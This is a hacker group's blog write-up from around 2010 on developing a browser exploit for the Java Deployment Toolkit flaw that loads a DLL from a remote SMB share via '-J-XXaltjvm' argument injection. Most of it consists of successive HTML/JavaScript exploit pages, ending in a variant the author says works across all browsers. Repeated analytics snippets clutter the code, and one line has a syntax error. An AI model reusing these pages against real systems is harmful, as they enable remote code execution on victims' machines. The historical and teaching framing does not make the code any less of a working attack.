Menu
Recent Blog Posts
Author : "vinnu"
Team : Legion Of Xtremers (LOXians)
Greets : SecFence team,Lord Deathstorm, Happy Terminator, fb1h2s, b0nd and all my friends
Note: This short paper is intended for wannabies who want to get a glance
of the process/way an exploit is developed when a new vulnerability is released.
I've chosen this vulnerability for the sake of simplicity and is easier to understand
distinctly every step.
Here i am presenting technical details about the Alternate JVM vulnerability
and its exploit development for all web browsers in the market. This story times around
April 2010.
In the afternoon everyone was busy in the team about the vulnerability published in
www.reversemode.com about the Java runtime environment by Tavis Ormandy.
So I decided to take a look and downloaded immediately all the JRE versions available
till date from JAVA's site.
Note: By that time the latest update of JRE was 6u19, which was also vulnerable and
java was not considering this vulnerability as critical for windows systems. The criticality
was that, every windows till date with java installed was vulnerable to remote code execution.
The activeX controls 8AD9C840-044E-11D1-B3E9-00805F499D93 and DeploymentToolkit activeX control CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
were vulnerable. The vulnerability was that an attacker can force JRe to load a DLL from a remote
smb share as an alternate jvm with specific name.
Started testing but all failed. A dll was prepared and was placed in a shared folder and a webpage
In first ActiveX mentioned above two parameters 'launchjnlp' and 'docbase' were vulnerable to
undocumented argument passing. And one of those drastic undocumented argument was -J along with -XXaltjvm
option this will lead to my rogue DLL injection.
The attacking code looked like this:
Code:
<!-----------jvmtest.htm------------------->
<html>
<head></head>
<body>
JVM Testing
<HR>
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0">
<PARAM name="launchjnlp" value="-J-XXaltjvm=\\ipaddress\share_folder_containing_jvm.dll_file">
<PARAM name="docbase" value="-J-XXaltjvm=\\ipaddress\share_folder_containing_jvm.dll_file">
</object>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
<!------------------------------>
But the attack failed and did not worked as intended. So I opened console and gave command:
java /?
To check its arguments. I tried some other arguments too and accidently i placed one of the
option right before "-J-XXaltjvm" and then tried. It threw an error that
Can not find \\ipaddress\share\jvm.dll\jvm.dll\jvm.dll
So accidently i now knew the two things:
1. "-J-XXaltjvm" needs some junk to be frefixed first like:
"abc -J-XXaltjvm"
2. It will automatically search for jvm.dll in specified shared folder, so no need to specify jvm.dll
Then I modified the above jvmtest.htm as:
Suppose u've placed jvm.dll file in \\ipaddress\share_folder folder then:
Code:
<!-----------jvmtest.htm------------------->
<html>
<head></head>
<body>
JVM Testing
<HR>
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0">
<PARAM name="launchjnlp" value="sd -J-XXaltjvm=\\ipaddress\share_folder">
<PARAM name="docbase" value="asd-J-XXaltjvm=\\ipaddress\share_folder">
</object>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
<!------------------------------>
all jre versions. It means i need to develop something that should work with most of web
browsers in the market.
Above code worked with jre versions nearly 6u18 and 6u19.
The second activeX provided above had a method named launch(parameter). The parameter to the launch
function was the place for our argument injection. So i altered the jvmtest.dll
Code:
<!-----------jvmtest.htm------------------->
<html>
<head></head>
<body>
JVM Testing
<HR>
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0">
<PARAM name="launchjnlp" value="sd -J-XXaltjvm=\\ipaddress\share_folder">
<PARAM name="docbase" value="asd-J-XXaltjvm=\\ipaddress\share_folder">
</object>
<script language=javascript>
var navig = navigator.appName.substring(0,5).toUpperCase();
var obj = document.createElement("OBJECT");
obj.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
if(navig! = 'MICRO') {
obj.type = "application/npruntime-scriptable-plugin;DeploymentToolkit";
}
document.body.appendChild(obj);
obj.launch("http: -J-XXaltjvm=\\ipaddress\share");
</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
<!------------------------------>
But three-four days after Kaspersky researchers said that the google chrome web browser
was not vulnerable to such attacks.
So it now seemed like a challenge for all the security community.
I too set for tackling it and discovered that if JRE versions 6u18 and 6u19
can be even targetted by applet tags without specifying the first activeX
classid listed above.
But initially chrome seemed to be immune to this trick too.
Soon i realised that chrome needs
src=""
And google chrome too fell in my hands....ah Kaspersky researchers, so many days of research,
so huge teams, and so many best equipments, How(why) did chrome escape....???
Following code was developed to kill all browsers in the market supporting java with
latest version at that time (jre 6u19) :
Code:
<!-----------jvmtest.htm------------------->
<html>
<head></head>
<body>
JVM Testing
<HR>
<applet code="" codebase="" height="0" width="0">
<PARAM name="launchjnlp" value="hitoall -Xnosplash -J-XXaltjvm=\\ipaddress\share">
<PARAM name="docbase" value="sowhatsurplan -Xnosplash -J-XXaltjvm=\\ipaddress\share">
</applet>
<script language=javascript>
var navig = navigator.appName.substring(0,5).toUpperCase();
var obj = document.createElement("OBJECT");
obj.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
if(navig! = 'MICRO') {
obj.type = "application/npruntime-scriptable-plugin;DeploymentToolkit";
}
document.body.appendChild(obj);
obj.launch("http: -J-XXaltjvm=\\ipaddress\share");
</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
<!------------------------------>
G4H Twitter
Teensy USB HID for Penetration Testers - Part 3 - Programming sketches in Arduino
In previous post we saw very basic usage of Arduino Development Environment (ADE) and ran our Hello...
SamratAshok 04-25-2012 10:51 PM